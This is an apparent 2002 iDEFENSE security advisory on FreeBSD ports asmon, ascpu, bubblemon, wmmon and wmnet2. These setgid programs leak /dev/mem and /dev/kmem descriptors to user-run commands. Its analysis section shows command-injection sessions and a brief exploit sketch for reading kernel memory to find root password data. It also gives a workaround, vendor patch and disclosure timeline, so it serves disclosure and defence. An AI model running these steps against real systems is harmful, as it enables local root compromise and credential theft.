I. BACKGROUNDThe FreeBSD Project's FreeBSD Ports and Packages Collection offers a simple way for users and administrators to install applications. More information about it is available at http://www.freebsd.org/ports/.
II. DESCRIPTION
The FreeBSD ports asmon, ascpu, bubblemon, wmmon, and wmnet2 can be locally manipulated to take advantage of open file descriptors /dev/mem and /dev/kmem to gain root privileges on a target host. These five programs are installed setgid kmem by default. They will drop kmem privileges before executing user specified commands but file descriptors to /dev/mem and /dev/kmem will remain open. This can lead to a local root compromise in various ways (e.g. if an attacker chooses to scan for the master password file in the Linux kernel memory).
III. ANALYSIS
The following examples illustrate the vulnerabilities:
ascpu
bash-2.05a$ ascpu -exe "dummy&/usr/local/sbin/lsof|grep
dummy|grep mem"
dummy 650 dim 4r VCHR 2,0 0t0 21146 /dev/mem
dummy 650 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem
bubblemon
bash-2.05a$ bubblemon "dummy&/usr/local/sbin/lsof|grep
dummy|grep mem"
dummy 688 dim 4r VCHR 2,0 0t0 21146 /dev/mem
dummy 688 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem
wmmon
bash-2.05a$ cat .wmmonrc
left "/home/dim/dummy"
bash-2.05a$ wmmon &
[1] 793
bash-2.05a$ Monitoring 5 devices for activity.
current stat is :1
bash-2.05a$ /usr/local/sbin/lsof |grep dummy|grep mem
dummy 797 dim 3r VCHR 2,0 0t0 21146 /dev/mem
dummy 797 dim 4r VCHR 2,1 0xc040f54c 21145 /dev/kmem
wmnet2
bash-2.05a$ wmnet2 -e "dummy&/usr/local/sbin/lsof|grep
dummy|grep mem"
wmnet: using kmem driver to monitor ec0
dummy 584 dim 3r VCHR 2,0 0t0 21146 /dev/mem
dummy 584 dim 4r VCHR 2,1 0xc037cb8f 21145 /dev/kmem
One possible exploit for these vulnerabilities is to replace getch() in strings(1) with:
int getch()
{
char buf[4];
read(4,buf,1);
return buf[0];
}
or a similar, less CPU-expensive function that reads a character from the /dev/mem file descriptor and execute the following:
wmnet2 -e exploit|grep root|grep Charlie
IV. DETECTIONThe latest copies of asmon, ascpu, bubblemon, wmmon, and wmnet2 from the FreeBSD ports collection are vulnerable and were tested on 4.6-RELEASE of FreeBSD. According to FreeBSD, all FreeBSD ports that use libkvm before and including 4.6.2-RELEASE may be vulnerable.
V. WORKAROUNDRemove the setgid bit on the affected applications via the command chmod g-s /path.to/wmnet2.
VI. VENDOR FIX/RESPONSE
FreeBSD advisory FreeBSD-SA-02:39.libkvm, which is available at
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-
02:39.libkvm.asc, provides the following patch details:
"Upgrade your vulnerable system to 4.6-STABLE; or to the
RELENG_4_6, RELENG_4_5, or RELENG_4_4 security branch
dated after the correction date (4.6.2-RELEASE-p2, 4.5-
RELEASE-p20, or 4.4-RELEASE-p27)."
VII. CVE INFORMATIONThe Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project assigned the identification number CAN-2002-1125 for these issues.
VIII. DISCLOSURE TIMELINE
| 8/12/02 |
Issue disclosed to iDEFENSE |
| 9/6/02 |
FreeBSD Security notified |
| 9/6/02 |
iDEFENSE clients notified |
| 9/16/02 |
Coordinated public disclosure by FreeBSD and iDEFENSE |
IX. CREDITbadc0ded (badc0ded@badc0ded.com) is credited with discovering these vulnerabilities.
